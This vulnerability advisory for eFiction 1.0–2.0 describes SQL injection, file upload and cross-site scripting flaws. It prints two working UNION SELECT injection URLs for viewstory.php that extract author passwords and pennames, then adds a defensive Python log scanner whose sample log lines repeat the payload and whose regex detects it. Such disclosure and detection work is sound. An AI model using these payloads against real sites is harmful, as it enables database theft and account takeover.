source: https://www.securityfocus.com/bid/15568/info

eFiction is prone to SQL injection, remote file upload, and cross-site scripting vulnerabilities.

These vulnerabilities may allow an attacker to view and modify sensitive information, gain unauthorized access, modify and corrupt the underlying database application, and obtain a victim's authentication credentials.

eFiction versions 1.0, 1.1 and 2.0 are reported to be vulnerable; other versions may also be affected.

http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
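
For defenders reviewing web server logs, the following added example (not part of the original advisory and not eFiction code) flags viewstory.php requests whose sid value is not a plain integer. It assumes sid is a numeric story ID and that logs use the common/combined format; the log lines, addresses and the /efiction/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client addresses and the /efiction/ path are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/2005:10:00:01 +0000] "GET /efiction/viewstory.php?sid=42 HTTP/1.1" 200 5120
192.0.2.55 - - [01/Dec/2005:10:00:07 +0000] "GET /efiction/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0%20FROM%20fanfiction_authors%20/* HTTP/1.1" 200 734
192.0.2.10 - - [01/Dec/2005:10:00:09 +0000] "GET /efiction/index.php HTTP/1.1" 200 2048
192.0.2.77 - - [01/Dec/2005:10:01:13 +0000] "GET /efiction/viewstory.php?sid=7%27%2F%2A HTTP/1.1" 200 611
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate sid is a decimal story ID and nothing else.
NUMERIC_RE = re.compile(r"[0-9]+")
SQL_HINT_RE = re.compile(r"union\s+select|fanfiction_authors|/\*|--|'", re.I)

def suspicious_sid_requests(log_text):
    """Return (client, reason, decoded_sid) for each viewstory.php hit with a non-integer sid."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/viewstory.php"):
            continue
        # parse_qs percent-decodes values, so encoded quotes and comments are seen in clear.
        for sid in parse_qs(url.query, keep_blank_values=True).get("sid", []):
            if NUMERIC_RE.fullmatch(sid):
                continue
            reason = "sql-syntax" if SQL_HINT_RE.search(sid) else "non-numeric"
            findings.append((client, reason, sid))
    return findings

if __name__ == "__main__":
    for finding in suspicious_sid_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule applied to sid in the application before the value reaches a query, together with parameterized statements, addresses the injection at its source.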